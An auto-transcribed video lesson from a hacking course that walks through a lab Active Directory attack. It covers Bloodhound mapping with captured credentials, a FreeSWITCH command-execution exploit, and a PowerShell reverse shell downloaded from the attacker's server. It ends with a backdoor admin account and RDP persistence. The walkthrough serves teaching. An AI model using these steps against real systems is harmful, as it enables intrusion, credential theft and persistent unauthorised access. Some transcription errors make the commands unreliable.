Alright, intruders, welcome to Module 9, the loot of an AD user and PS1 Windows tricks. So what I'm going to do is I'm going to include these as reference. If you look below the video, you will see these items and these commands added as reference so that you can just basically copy and paste them and get Neo4j initialized. But what we're going to do here is I'm going to use wget. I'm going to copy this command and bring it into my terminal. -o, and then https at neo4j.com/nanotechnology.gpg.key. Pipe that out to sudo apt key add. And we're going to, that's written to standard out. This is just a series of commands that I want you to be able to undergo so that we can, well, more successfully map out the network with Bloodhound. And we're gonna have to punch in our sudo password, no worries there. And we'll paste in the next command. If you need to pause the video, that's fine, or you could just copy and paste it from the resource section. Really, this is just about getting everything ready to go. And before we do any installing of new things, always remember to sudo apt-get update -y. The -y is short for yes. It'll auto prompt to go through. It's gonna auto prompt for yes or no. We're basically just saying, auto yes on that. And after that, we can install Neo4j. It may give me an error on my system saying, oh, you already have it, but you won't. So if you need to pause the video, let it download, depackage, and install, then that's exactly what you need to do. I'm going to pause this video during these download times and update times and just resume it when we're back. All right, so for me, I got some issues here. No worries. It did end up going through. Then what we're gonna do is sudo apt-get and install neo4j-y again for yes. And it's gonna say something maybe like I already have it, or maybe it's just gonna go ahead and re-download and install it. Then after that, we're gonna need to install OpenJDK. OpenJDK 11 to be more specific. And then we're gonna have to configure and provision our machine to make sure, there we go, everything's good there. And we'll type sudo, just to make sure that everything is good with Java, that we're using the right version of Java. I'll show you, it's only one command. It's very straightforward. But first we gotta get OpenJDK installed. So sudo apt-get and install, you can even put a -y-yes there, OpenJDK-11-JDK, and hit the return key. See, for me, that's already installed. You may need to pause the video here and get that installed, in which case, no worries, that's totally fine. Pause me, put me on hold, and go ahead and do that. If you don't have to do that, or if you've done that already and you've unpaused the video, then what we're gonna do now is update our alternatives, right? So you can have multiple alternatives of Java on the same machine. And what we're gonna do here is type sudo update alternatives, go figure, right? --config Java. And it's like, okay, which one do you want? We have Java 21, right? Java 17, Java 21 again, another variation perhaps. But you might be thinking, go with the latest and greatest, but no, stick with OpenJDK 11. So I'm gonna punch in one, there we go, and hit the return key, and that's it. That part is done, and you can verify that by typing Java --version. Excellent, so we've got OpenJDK provisioned, it's set to 11. We're good to go, and now what we need to do is actually start the service. So in another terminal down here, I'm gonna sudo switch user. Actually, let's see if we can, I want to demonstrate something here. We're gonna type service, right? We're gonna say service neo4j start. and it's going to ask, see here, for our password. So this is something when you're dealing with services on a Linux machine, you're going to have to do that as root or as what we call UID equals 0. So sudo, remember that for when you're attacking machines too. Sudo, and when you're doing your post-exploitation enumeration on Linux, but sudo service neo4j start. And then you got to punch in your password. And now that that's done, what we can do is type sudo service neo4j status. And there's our status. Status is active and that it's running. Wonderful. Great. So you can press Q to get out of that, clear the screen. And back up here, what we're going to do is we're going to open a web browser. I'm going to open Firefox. And we'll let Firefox load up. And then what we're going to do is go to 127.0.0.1 on port 7474. And this is going to open up the Neo4j console. So we have a database. Leave that empty and go ahead and leave that empty for the default. Our authentication type is going to be username and password. For you, I want to emphasize this. For you, I really want to emphasize your default Neo4j credentials are Neo4j, Neo4j. But we need to change those credentials for, well, everything to work. So let's go ahead and do that. So let's change those credentials. And what we'll do up here for you, it's going to be Neo4j and then Neo4j. I have Neo4j pass, so I'll put Neo4j pass in, but that should be Neo4j for you. And if I hit connect, it should connect and bring us to our dashboard. And that's it. That is literally all you have to do. But I also want to show you how to change your credentials as well. If you need to change your credentials, you can certainly do so. In fact, upon your initial, if you're looking at your screen, you're probably seeing something akin to, well, let's hit settings. Go to settings. If it decides to load, it might not load. You might be getting that query that it's mandatory to change it the first time around. So just remember, it's completely normal that you're not gonna, like on my screen, I've already got this initialized, and I already set up and configured Neo4j, right? So on my screen, you're not gonna see a prompt to change the password. But on your screen, you will. So with Neo4j basically configured and ready to go, the username Neo4j, and whatever you ended up setting the password to, we're ready to rock and roll. What we're gonna do next is update our Etsy host file. So if you recall, we have, if we go into our recon and DC results, and we cat the DC results file, okay, and that's what we're interested in. So with that in mind, what we're gonna do is update, and you'll see I've already done so, sudo nano Etsy hosts. This is how your Etsy host should look. I'm gonna put that in here. This is how your /Etsy/host file should look. We want 10.65.1.20 to be mapped to DC Kinetic. That's the primary domain admin machine. And then the domain name server or DNS server is usually a good rule of thumb +1, and that falls on kinetic.corp. You're gonna find in a lot of these that it's usually like the name server is usually +1, whatever the domain controller is. That's a good rule of thumb. And we can hit Control X once you got that, Y and enter, and we're ready to keep moving. So next we're going to be working with a little tool. If we go back to our root directory here and clear the screen, known as Bloodhound Python. So at this point, let's go ahead and go back to our enumeration. If we take a look at the users that we have Vaughn, Blackmagic, Pete. If we take a look at the passwords that we have Spellcaster. And from the previous module, we learned about DC Kinetic, and we learned about a great number of other things associated with the AD user Vaughn. So now at this point, we're ready to launch Bloodhound. What we're going to do is type bloodhound-python, say a user is Vaughn, a P we're going to say is, or the password is going to be -P for password, is Spellcaster. And there we have that. And then we have to specify the domain. Remember that we have set our hostname resolution, right? For 10.65.1.21 to kinetic.corp, right? So what we're gonna do is say kinetic.corp. So if I, for example, if I ping kinetic.corp now, you'll see, but you'll see that we're getting back information, right? We're getting that ICMP back from a hostname resolution, kinetic.corp. This could be anything that you wanted it to be. This could literally be, hypothetical domain.corp, and it would still come back because we've set it to be so in our hosts file. That's an important point from a networking perspective to understand. But we have it mapped out from our enumeration. We have Neo4j open, and we're gonna specify the domain as kinetic.corp, and then we're gonna say -C for checks all, -verbose, and then the name server is 10.65.1.20, which again, if we cat etc hosts, is DC Kinetic. The idea behind this is that we are going to use the user Vaughn, which is a real Active Directory user, to map out the network with Bloodhound. That's what we're about to do. So we've got this specified, we've got the username, we've got the password. We're gonna say -V, we got the -V for verbose. Everything is good to go. We've got the IP. Now we could just hit the return key here, but I want it to be in zip format because inside Bloodhound, which we can launch that, by the way, you can have that launched if you'd like, but just tack on --zip. And while this runs, there we go. It's querying, it's authenticating as the user Vaughn. Our plan of attack is working, and look, found 48 users, like goodness gracious. It's gonna go through quite a lot of information here. It's gonna do what it was made to do. This is Bloodhound being Bloodhound at its finest. But we're going through and we're collecting all of the information that we can based on that one set of valid Active Directory credentials. And this is to kind of show what a threat actor might be able to do in the event of compromise, right? So here we are. We've got it all here to blarg_bloodhound.zip. How do we open that? How do we deal with it? How do we get it into fancy output? I've got you covered. So before we get to that, however, I do have something else from a networking perspective that I want to demonstrate. We have our zip file, and that is ready to be imported into Bloodhound. But I also want to point out something super crucial. I came back and I was rewatching this, and I decided to really kind of just readdress this one particular issue. Slight intermission. What I want to say is, look at this. If we sudo nano etc hosts, we have, and this maybe, the reason I do this is because this can be confusing to some people. We have 10.65.1.20. Make no mistake, that's the domain name server, that's the domain name server, and that's the domain controller as well. And if we really wanted to give it the fully qualified domain name format, or FQDN, we'd say dckinetic, right? dckinetic.kinetic.corp, because dckinetic is a member of the kinetic.corp Active Directory domain. So there are other machines that run Active Directory in the kinetic.corp domain, not just .21. So our previous command worked with .21, but I'm going to demonstrate something that most people will not show you. Let's look at our enumeration. Say we'll look at something else that is running, like here's our .21, excuse me, and that is silo.kinetic.corp, and it has Active Directory running with our 139.445, so on and so forth, right? And if we get down to, say, something like, I don't know, .38, remember that machine that we owned, Space Pro? Well, let's take a look at this. This has got 135, 139, and 445, and our enumeration came back and said that Space Pro is also a part of the kinetic.corp domain from a server message block or Active Directory perspective. So wouldn't that mean that hypothetically we could run that same Bloodhound command, but instead of kinetic.corp resolving to 10.65.1.21, we could just put 38 there? There's only one way to find out. Let's go ahead and save this, and let me kind of show you what's going on. So we have kinetic.corp. Kinetic.corp is fundamentally the domain here. This is the domain that we're in. It is anything that is connected to an Active Directory domain. So if we search through this for kinetic.corp through all of our enumeration, we'll see we have that up here, of course, on .21, which we got our successful results on. And we also have that down here with this other machine, .38 Space Pro. So hypothetically, couldn't we just put Space Pro as that .38? This is our Space Pro machine. We could also, make that spacepro.kinetic.corp. The important part, and this is really the important part here, is that the -d parameter in Bloodhound Python tells the tool which Active Directory domain to target. In this case, like kinetic.corp. It ensures Bloodhound connects to the right domain controller to gather information about users, groups, permissions, and more. The domain name is resolved, right? The domain name, here's a domain name, right? Or here's a domain name, like DC Kinetic. It gets resolved to an IP address, kind of like Yellow Pages. A phone number gets resolved to a host name. The domain name is resolved through the DNS server provided with the -ns argument in Bloodhound. That's the name server. That's our DC Kinetic, our domain controller. That's where Kerberos is on port 88. That's where the loot is. And that's where, we're going to talk about some other things associated with that server. But what this does is it allows Bloodhound to access key Active Directory services like LDAP and Kerberos. If we were to not provide the -d here, the tool wouldn't know which domain to query. This would cause errors in authentication or data collection. So we just had a success with .21, but let's do a little experimentation. There is another Active Directory domain, or FQDN, of spacepro.kinetic.corp, and it's running 139.445, right? NetBIOS SSN. Let's go ahead and take a look at that. Let's see how this comes back. Authenticated is the user Vaughn and the password Spellcaster with a 3. So we hit the return key, and look at that. It goes through. It goes through, and we actually start to get information back. Now, this will not work for any of the other machines that are not a member of that Active Directory domain, which is kinetic.corp. So this will go through and produce all the same results. Bloodhound Python will go through and do its job, and it's gonna output everything as it should. Hopefully we get a zip file at the end of this and not a bunch of JSON, but look at all the information that it's getting back, and that's from a completely separate machine than we just queried. I want you to know this because it's important from a networking perspective to understand that the domain name is kinetic.corp. The Active Directory forest name is kinetic.corp. A fully qualified domain name is something like spacepro.kinetic.corp, dckinetic.kinetic.corp, or silo.kinetic.corp. And sure enough, look at that. We have compressing output into blarg again and bloodhound.zip. I digress. Let's go ahead and get this information into Bloodhound through the graphical user interface. Let's open up Bloodhound. With Kali Linux, the graphical user interface comes with it, so let's just open Bloodhound. And now that we have Neo4j set up and running as the service, we type in our username Neo4j, and then you type in whatever password you provisioned for Neo4j. I'll go ahead and type in mine. And we have a successful connection. Now we're gonna get in here and you're not gonna see anything. It's gonna say no data returned from query. That's okay. What we wanna do is just take a look at the buttons here. We have refresh, export, import graph, upload data, view upload status. We can change the layout type, settings, and more information. We're interested in upload data. So we're gonna select upload data. We're gonna go to, well, let's go to our home directory, and then let's go to engagements, if we can find that on the list, or engagement, the kinetic range, and we'll select our Bloodhound zip file. We'll hit open, and once we let everything upload, you'll see upload complete, underscore containers, users, computers, domains, groups, gpos, ous, post-process, all done. We can close out of this and we're pretty much good to go. Now if we expand this, you'll see that there are relationships. These fields are not empty anymore. And we can refresh the database stats, which is excellent. And now they're really populated. We have relationships, 1,826. ACLs, 1,536. Users, 48. I mean, just take a moment to really realize what we just cracked here. It is pretty awesome. We've got groups, 71. Computers, 17. OUS, 28. GPOs, 16. And 2 total domains. So that's pretty wicked. Let's just take a moment to appreciate that and kind of see where we go from here. Let's say, for example, we wanted to do analyses. You could click the Analyses tab. You want to think from small to the larger side of the triangle, ways that we can infiltrate a computer or infiltrate. This one says to get into here from kinetic.corp, and to get into dckinetic.kinetic.corp, we could utilize a DC sync attack. Already out of the gate, we've got tons of information. And this is, if you take really into consideration how long it took us in these modules, this is from a learning and teaching perspective. Imagine if the power that you would have, right? That we're teaching you here at Startup.Security to be out of the gate, to have that out of the gate mindset when the lid opens. If you were to implement all of that into your own methodologies with your own notation, to be quick with the hotkeys, to be quick with the information that you get back from the terminal, I mean, you could have all of this within 30 minutes or less if you really get good. Now, I'm not going to put that pressure on you. That comes with years and years and years of experience. But at the same time, it is the right methodology. You're looking at the right things. And overall, we're here to continue to support you in so doing. Let's just show some cool things that we can do with Bloodhound, right? So you can do raw queries here as well. In fact, you should definitely look this up in your documentation. but you can do raw queries here. And one such raw query is you can say match and then in computer return in. And what this will do, this little query in and of itself is just going to pull back all the computers. Just say you want to see the computers on this network. That's what this does. Boom. Now you've got all the computers in your scope. Let's say now you want to find the shortest path to dckinetic.kinetic.corp. Pick any target, Pick any target that you like. You can right click it. You can mark this as, for reference, you can put a little skull icon on it to mark it as owned. We haven't marked this as owned yet, but you can right click and say shortest path to here or shortest path to here from machines that you've already compromised. It takes that into account. So shortest paths to here, and boom. We're locked and loaded, and we have everything that we need to compromise dckinetic.kinetic.corp. So assuming we get a foothold, then we can also speak to DC Kinetic. Now there is a series of users here. You can sort by users, and then you can also, can I zoom out? Yes, I can. There we go. And if you hit change layout type, you can get a different layout. Maybe that layout wasn't doing it for you. Maybe this is more of your style in terms of how you wanted to see things, Maybe this is the different layout. Maybe you did like this layout. Let's say we want to keep it here. Here's another option, right? At a different angle. So this gives you options in terms of how you want to view the information, to view the groups, to view the machines, to view the domain controllers, the name servers, so on and so forth. Domain admins, like Rox, for example. Looks like Rox here is a member of the account operators group. So that's killer information. That's really good information right there. I mean, if we had access to Rox, we might, if we were able to compromise the Rox user, now we don't just have, 48 users that exist, right? But we've actually identified the one user like Rox, or if we go back to, analyses and shortest path to high value targets and the whole kinetic.corp domain. I know it looks like a jargled mess, but if we look around at these other green little icons, you'll see the user Jane. Look at Jane, and if I hover over it, you'll see here's me not hovering over it. Here's me hovering over it. When I hover over it, it's going to turn red. This is everything Jane is attached to with regards to our shortest path to the high value targets. Right? Jane is a member of enterprise admins. Jane is a member of domain admins. Jane is a member of, if we're just tracing the red, group policy creator owners. She's attached to the machine dckinetic.kinetic.corp. Obviously, if I were to target a particular user on this domain between Rox and Jane, I'm looking to see who has the most effective authority and privilege over the domain. Which of these admins really has more? We get to see in this network, what we've got, and the answer is Jane. Jane should be our real target. But if it was Rox, that'd be cool too. We should, in theory, be able to access dckinetic.kinetic.corp with Rox right there. And if we zoom in, how do we do it? If you can read that small fine print, it says can PS remote. Can PS remote. So if we got credentials for Rox, we could PS remote straight into the domain admin machine, DC Kinetic itself, right? But if we had Jane, look at all the groups that she's a member of. We could add ourselves as a domain admin across all the machines. So I want you to take that into consideration. I know that was a lot of speech there, but this is something you want to have and you want to have on in the background at all times. That way we have our shortest path to target, and we know that the user we need to be using is Jane. The user we need to target is Jane. and the one that we need to compromise the entire network to add ourselves as a domain admin across the domain is Jane. So we've got our target. So we've got our primary target, Jane. But let's take advantage, and we're moving very quickly. Let's take advantage of our lab access and just go after a machine. Sometimes I will encourage that, let's just go after a machine. Let's compromise a machine and let's pick one and let's go. Also, if I feel like there are techniques that, a machine can teach you, I'm gonna lead you down that path in full. So we can clear the screen there and let's go back to our cherry tree. Look, we've got our Bloodhound data now. We've got our cherry tree. We've got our netx guest check. You guys remember when we did that in the previous module? Well, we've got that as well. And let me go ahead and set that to red, select, and set this to red as well. Select, there we go. Okay. So let's just choose one, right? What about broadcast? Let's choose broadcast. I'll highlight that. And then single targets, I'm gonna add underneath single targets. This is to teach you about organization, to teach you about structure. We're gonna talk about some Windows exploitation and some bypass techniques. So what we're gonna do here is we're gonna add a subnode and we're gonna say 10.65.1.40 broadcast. So the IP and the host name, we'll bold it. And what we're gonna do is we're gonna copy our template over for each new machine. Remember, we do that. The IP, 10.65.1.40. New target, what do? Export the IP equal to 10.65.1.40. What do we need from it? An Nmap scan, Nmap -p-, and we'll say -sv-st-a at the target IP tac open, and even before tac open, we'll give it a min rate of 2000, and we're gonna throw an aggressive scan at this machine and just kind of see. Actually, let's not do an aggressive scan first. Let's go for service version and do a TCP connect scan, and we're also gonna treat this machine as online with -pn. So let's go ahead and perform this scan. And what we're gonna do is we're gonna look back at all 6 of them. We're looking to say, okay, of this new target machine, completely segueing away, from just purely targeting an Active Directory user here, we're just segueing away into straight up attacking machines. So buckle up. We're gonna Nmap this machine out, and we're gonna get down to hacking and cracking. I don't know what else to say. The more the merrier, right? The more the merrier. So I'm gonna go ahead and pause this video, and when the Nmap scan is done, I'll go ahead and unpause it. Okay, so that's that. We've got our Nmap back, and this is good enough for now. Let's go ahead and copy it. Up through Nmap scan report 4, we're gonna Alt tab into cherry tree. We're gonna paste it in. We're gonna do our highlighting, right? Typical highlighting. There's only a couple of ports here, so remember, use your Shift, Alt, Control, left arrow, right arrow keys to be able to move around and get fluent with this. That way you're faster than if you were using a mouse, and before you know it, you'll be, as quick as I am at being able to make the services, the ports stand out, and we're just gonna do our typical highlighting here. But we notice immediately free switch. So free switch, mod event socket. We're gonna clean up the irrelevant information from the scan. We're gonna clean up even further irrelevant information and clean up this top portion of irrelevant information. Done. We've got our scan done for the machine. Now we need to target the most weakest fruit. We've got WebSocket version 13, it looks like. And we've also got the highest ports. Remember, you wanna start with the highest ports and work your way down. Higher ports are gonna tend to have more vulnerable services running on them. So in this case, we have free switch event. Let's go ahead and open Firefox, or you know what? Instead of opening Firefox and going to the exploit database, we can clear the screen and there is something else that we need to do. Let's go to targets. Remember how we made a directory for our machine space pro? We're going to do the same thing here. Make dir broadcast -10.65.1.40. cd into broadcast, make dir vulns for any vulnerabilities that we might find. Make dir files for any files that we need to play with, mutate, whatever it is that we need to do or work with. We have that directory. Your red team will have that directory. Say you're sharing a box with them. This is a notation and organizational structure where they can SSH in and have immediate information on any target machine that they need. So make dir vulns, make dir files, make dir exfil. What about any exfiltrated information from the machine? We want to have a directory for that as well. And then you'll get this one down: touch users, touch passwords, and touch hashes. Any users we gather, any passwords we gather, any hashes we gather, LL, smash the return key, and there it is. So we've got our Nmap ready, we've got our IP exported, and we have free switch. So what we're gonna do is search the exploit database for free switch. Let's say there's already weaponized code out there that's been verified. You want verified code first. Always search the exploit database first, because if you're not searching the exploit database first, then you're potentially playing with unverified code. What do I mean by that? It means malicious backdoors could be installed by threat actors, APTs, or advanced persistent threats. So, quite frankly, using Searchsploit to search the exploit database, not such a bad idea. Let's go ahead and search for free switch. Boom. We've got event socket command execution in Metasploit, and we have a command execution in a text file. What we're gonna do is we're gonna copy this. You can literally just double click it and it copies the whole thing, the whole path. And to bring it to the current directory, well, that's a vulnerability. Let's cd into vulns. And then what we'll do is search exploit, and you can just copy it straight to your current directory. -m, paste it, boom. ls-lsa, we have it in our present directory. So we've identified the lowest hanging fruit. We've identified a potential command execution for it. We have it in our vulnerabilities directory. Now let's go ahead and take a look at it. What is it? And I'm gonna go ahead and close out of this bottom terminal. And it looks like it's a Python script in the form of a text document that we got on there. So we can rename this. Let's clear the screen. And we're gonna move 47799.txt to be 47799.py. And if we run Python on 47799.py, it'll say this is our usage for it. We have the target and the CMD that we want to execute. Well, we have our target IP, and then let's say we want to execute. We know it's a Windows machine because everything in here is Windows. So even up here, we can put target OS is at least Windows. We don't have an exact version on that Windows version just yet, that OS version just yet. But we know it's Windows, so let's try executing whoami. And hopefully this works, authenticated, and boom, we've got it. That is what we like to call around here, bling bling. We just got command execution over the target machine. I don't know what else to say. It is that awesome. So we have command execution over the target machine. So command execution done. Now what? We need a reverse shell from a LOL, or lay off the land, or lay of the land binaries. In this case, that's PS1 or PowerShell. So we're going to utilize PowerShell to get a reverse shell from the target machine. How do we do that? What I'm going to do is actually go to my transfers directory. I'm going to copy from my, you can search for it, but you can copy home. For me, it's Kali transfers, and then PS1 and revshell full.ps1. And if needed, I can provide this as a resource, but what we do here, and this will be beneath the video. Let me make that clear. This is going to be beneath the video. So really just go beneath the video, copy that resource, this PowerShell reverse shell resource, and bring it into your Kali machine. Additionally, you could search the entire Kali Linux machine by using the locate command and search for PowerShell and grep -i case insensitive for rev and --color equals auto and see what comes back. You know, you've got a lot of options here, but let's say we want to look for, I don't know, a reverse shell. Look, you got a PowerShell reverse.ruby that's part of the Metasploit framework and so on and so forth. But the point is you can look across the machine utilizing the locate command. For example, you can locate, say you want to locate PHP, grep -i for reverse, --color equals auto. And then you have, you know, PHP reverse shell .php. Or you can locate JSP and search for reverse and get a reverse.jsp from seclist actually, and use your shell web shells JSP reverse.jsp. So a super sick command there to be familiar with. But we've got command execution. So now that we have command execution on the target machine, we need a reverse shell. This means download, permit, and execute. That's 3 simple steps. Download, permit, execute. There's a little trick on Windows we refer to, or we utilize when talking about, you know, where are we going to place this? Where are we going to do this? How are we going to do this? Well, we got to download it. We got to transfer it to a world writable directory. So I'm going to put that down here. What are we doing? We're going to transfer our reverse shell to a world writable directory. And that is going to be C. That's going to be C Windows tasks. Well, I'm going to show you a little bash RC little thing I have. I have something called simple HTTP. So like I can type simple HTTP. Again, I think this is an important alias so that you can serve files. Like let's say we want to turn this directory vulns into a web server. You can do that. How do we turn this directory into a web server to transfer our reverse shell? I type simple HTTP. That command isn't going to work for you. But if I cat my bash RC for you and grep -i for simple HTTP, you can add this to yours. What does it do? It gives us our IP, if config on ton 0, that's an added bonus, and then greps that to inet just to get back the inet address. And then we chain that command into python-m http.server, and the default serving port is 8000. So realistically, I could just type python-m http.server, and it would do the same thing, but I like to have this in a bash alias because when I'm working with reverse shells, I know that I'm gonna need my Kali attacking IP. So I include that in the command to just kind of kill 2 birds with 1 stone. So I'm gonna Control-C, clear, up to our current task, simple HTTP, and there's our IP. And what we're gonna do is copy this, and then now we need to do what? We need to modify the reverse shell or revshell-full.ps1 file. So let's do that. Nano revshell-full.ps1. And we need to set our IP. So whatever it is, we paste it in here. Whatever port we want to listen on, say 9090, we can put that right there. And that's it. That is all we need to change for this to work. And where is this going to go? Where's it going to go? C Windows tasks, the world writable location. On Linux, we have /temp On Linux, we have /var temp. On Linux, we have dev shm. These are world writable locations. If you get a shell, this is where you live. This is your home territory. On Windows, we have C Windows tasks. So guess where we're going to be writing it to? C Windows tasks. Excellent. So we're serving. All we need to do now is go back up to our command or our payload. In fact, we can just do that right here. Python 47799.py at the target IP and say, who am I? And let's see if we can put our command in quotes. It's really useful if we can do that. Sure enough, we can. We can execute the who am I command in quotes. That's important because we're going to be using PowerShell instead. Now, what we're going to do is use PowerShell to transfer or to basically download. The remote machine is going to download our revshellfull.ps1 file to C Windows tasks. So what we'll type here is essentially PowerShell -command and then invoke -web request -URI, and then in single quotes we have to have our URI, http://. This is where I like to have my IP. Boom, on port 8000 /revshell-full. Let me bring this in. revshell-full.ps1. And then outside of that single quote, that is outside of that single quote, but inside the double quote, we're still working with PowerShell. We need to say, what's the output location? What's the output file? We do that with outfile. And then in single quotes again, two single quotes, C Windows tasks as, well, you know what it is, revshell. We want to output it as revshell-full.ps1. And we hit the return key, and we should get a hit here that it downloads it from our machine on port 8000. Authenticated. Command should execute. We got a hit. Code 200. Excellent. Don't worry about error no reply. I'm pretty sure that it worked. So now what do we got to do? We downloaded it. We don't have to permit it. It's already permitted on a Linux system, we would have to. On a Windows system, it's already permitted to be executed out of C Windows tasks. Now there may be some times where you may need to do things like add np preference for something to be executed out of there. You may find that in a future machine that you put something in there and it downloaded, but you go to execute it and nothing happens. That could be antivirus taking it and snatching it up, like a hand in a cookie jar, going in and saying no, and I'm going to quarantine that and put that away. In which case you can utilize if you have an administrative user, or if you're executing code as an administrative user, use the command line and use code execution to disable that antivirus. But you have to be an administrative user for that to work. All right, so let's go ahead now then, and we are going to also enable an execution policy. So I can't just say PowerShell execute C Windows tasks revshell-full.ps1. That would get flagged. We have to do an execution policy bypass. So I'm going to say -execution policy bypass which file? -file C Windows tasks revshell-full.ps1. And if at any time you need to take a break, and if at any time you need to just rewind, that's what these modules are here for. I'm trying to get as much explanation in as I can for these more complicated things, but these are the methodologies and the types of things that you've got to have and you've got to understand. Downloading, permitting, executing, world writable locations, knowing the native technology that you can execute. If it's Linux, we go for Bash or sh. If it's Windows, we go for PowerShell, right? These are just the typical things that we go for. So in this case, we're going for PowerShell, quite obviously. And lo and behold, if everything works out, we should have a reverse shell in a terminal here if we set up a netcat listener on our port 9090 as we specified. Remember when we modified it? I specified port 9090 as the listening port. Well, now we're going to execute it on the remote machine. We better have a listening server up, right? Let's hit the return key. Authenticated. Let's hope that execution bypass or execution policy bypass works. And give it a moment. Boom. We've got a shell. And it is a PowerShell prompt. So we've received a shell on the target machine. And again, as you know, that is bling bling, because that's the thing. So we've just completely compromised this machine. We can cd to /, we can type dir, and there's everything there. We can cd to users and type dir. It's a little laggy of a shell, little bit laggy, but you know, what are we looking for at this point? Well, I want to be able to transfer something like mimikatz to the target machine. But in this kind of a shell, it's not like Bash where I can stabilize the shell by hitting Control-Shift-E in Terminator and then typing breakout, and, you know, exporting and getting a valid TTY one item at a time and having a stable shell. That doesn't work here because we're on Windows. How can we get a stable shell on Windows? We want a stable shell and we want to maintain access. We've gotten access to the machine, so what can we do? What can we do? We can add ourselves as a user. First, let's type net users. What users are here? All right, we've got punks. So we can say net user punks. That's us, by the way. Let's hope they're an administrator. If they are, we can do some fun things. Boom. They happen to be an administrator on the machine. So I see that they're an administrator on the machine and my priorities just changed. What does that mean? I want to maintain a persistent shell and use that administrative authority as a local system admin to add myself as an admin. So how do we do that? Siren, how do I add myself as an admin from the Windows command line landmine? How do I do that? Net user, and then you can type siren sumpass /add, right? So net user, your username, your password /add. Done. Because we're an admin, that command completed successfully. Now if we type net users, Siren is a user on this machine. Further than that, we need to make Siren an administrator. So I'm going to say net local group administrators siren /add. This is that out of the gate mentality, right? Maintaining access, maintaining privileged access over the machine, right? We can explore and tinker with it as much as we want to, but our core focus has got to be maintaining authoritative access over the machine. So now if we type net users, there's Siren right here. There's us. There's our Siren user. Net user Siren. And guess what? We're just like punks. We're an administrator user on this machine as well. Let's go further than punks was. Let's add ourselves as a remote desktop user. So I'm going to say net local group remote desktop users, and then we'll say siren /add. The command completed successfully. And now if we type net user siren, you'll see that the user siren is a member of now a member of remote desktop users. But siren, what's going on? Port 3389 isn't here. Port 3389, that's remote desktop protocol, isn't here. Well, what are we gonna do? We're an administrator on the machine. we can enable that ourselves. So that's exactly what we're going to do. So in essence, from this point, and I really want to recap, it didn't take us long, right, to identify, using this methodology and the highlighting and identifying the lowest hanging fruits off the high ports, finding a vulnerability for a remote code execution, exploiting it, and so on and so forth. Like, let's just recap. Getting a shell, a PowerShell reverse shell, getting that transferred over did not take much time. Imagine if you didn't have to listen to me and you just had it committed to memory. Goodness gracious, you'd be a lethal intruder. So, but that's what we're teaching here, right? That's what we're getting across. So already we've made short work of this machine. We're already an administrative user over this machine. Let's just acknowledge that for a moment and pat yourself on the back because you deserve it. So how do we maintain access? I like to add there are multiple ways of doing this. Some people use Cobalt Strike. They'll install like kind of like rootkits on a machine that can be disarmed at any time, or like with a kill switch on them, with a formal type of rootkit though for an engagement, with a formal Cobalt Strike server, what we call a C2. That's one way of maintaining access. But in this particular case, I'm being a sneaky little squirrel, and I'm just gonna add myself as a remote desktop user on the machine, so I can RDP in and have a stable shell and execute things like mimikatz. Remember, this way we can have a stable. We want to have a stable shell. We want to transfer things like mimikatz.exe over without losing our shell. We want to dump credentials like from MS Cache from the machine with mimikatz, among other things, among a large amount of other things that mimikatz can do. We want mimikatz on the target machine. So step one, we gotta kind of allow windows through the firewall. We gotta allow port 3. I mean, there's just some boxes that we gotta tick. I could type net start term service, and that would start the remote desktop service. Easy, boom, done. But it's not gonna appear from the outside. Let me demonstrate what I mean. If I open up with Control-Shift-O, open a new terminal and type nmap-p, specifically 3389 at 10.65.1.40, and let's treat this as online, and say -sv, even attempt to do a banner grab, it's gonna come back as closed or filtered, right? Well, let's try net start term service. It's gonna say the remote desktop service is starting. The remote desktop service service was started successfully. Let's try our Nmap scan here of our recon of port 3389 and make sure that this machine actually has, well, the port open, right? Unfortunately, it's not that easy. It may be open locally on the remote machine, but we haven't opened it up to the world, like 0.0.0.0. That is world or other in the world of TCP IP networking. We haven't opened it up yet. So we need to add firewall rules, and we need to add ourselves as a user, which we've already done. So we can do this by playing as an administrator from the command line. We don't need to open the registry editor, the graphical user interface. We don't need to do that. We can use things like reg, add, and I'm going to include all of these resources in the specifically in the resources section. But when post If you type winpost, you should have this one definitely in your reference directory. So you can just type winpost, short for Windows Post-Exploitation. Boom. And I already have a section here where I can just copy and paste commands that are associated with adding yourself and starting RDP. So you'll see I've got myself added. We've already done those things. We want to take this whole command, copy that, and paste it in, and hit the return key. And the operation, because we're an admin, has completed successfully. Next, we want to set sc.config to start. So if somebody reboots this machine, we want to maintain access. I want the RDP service to come back as auto. This command might work from cmd.exe, but I've updated our winpost or Windows priv.ask.txt. You can just call it winpost if you like. But I've actually updated this to if PowerShell, we need to call sc.exe specifically for this to work. Otherwise, you're going to run into an error. So copy this, paste it over, sc.exe, config term service start equals auto. And what this does is it allows us to maintain access. In the event that the target machine is rebooted, the remote desktop service comes back up, and being a remote desktop admin, we still have access to that, so we maintain access. This is just, I'm trying to instill that mentality of, you want to maintain access, whether it's through a Meterpreter session and you're playing around and just learning for fun, or whether you're doing this, in a professional red teaming engagement with something like Cobalt Strike and aggressor scripts and all of that fun stuff. Then I want to teach you this concept of maintaining access. So if you recall earlier, we had net start term service. Next, we need to add a firewall rule with the netsh adv or advanced firewall set rule group remote desktop, new enable yes. You can paste this one in, and that should go as well. Updated 3 rules, okay. Now we can type netstat-an and find 3389 and see if it's on the list. All right, it may not be there, but let's see if it's there from the outside. Let's nmap -p 3389 at 10.65.1.40. Let's try with -pn. And there it is. Now it's been opened to 0.0.0.0 in TCP IP speak as world or other. And that means it's accessible to us. So we're gonna drag this terminal up. We're actually gonna exit this terminal. I'm gonna show you something really cool. So here it is. I've already got this command locked and loaded. We're gonna use xfreerdp. Make sure you set your timeout to something like 60,000 so you can, maintain access. We're gonna set cert to ignore, and this specified /v, specify the IP : the port, the user that you added, the password that you specified. Like if I type net users, we added siren with the username of somepass. So this is that full thing, and I'm gonna exit out of this. Let's see if we can RDP into the machine successfully. And fingers crossed. Now remember, we have a shell here. We have an active user. We have punks as an active user. Yep, another user signed in. If you continue, they'll be disconnected. Do you want to sign in anyway? I'm gonna exit silently as the user punks. I'm gonna exit that shell. And I'm gonna Alt-Tab back and say yes. Now please wait for, broadcast punks to respond. We've exited. We're no longer there. We're gonna let this circle. And what it's gonna do is generate a first-time profile desktop layout. Microsoft Windows is gonna do its thing, but it's gonna do it for our new user that we added as an administrator to the machine, the user Siren. So this is just gonna take a brief moment, but in a second, it should come back, it should respond. And there it is. We get the welcome message, and lo and behold, Did we get the bling bling? Did we get it? Where's my Windows desktop? Come on. Patience is a virtue, they say. We'll be patient here. It's going to keep circling. It's generating the profile. Presumably. Right? First time sign in for a user, a new user. And it 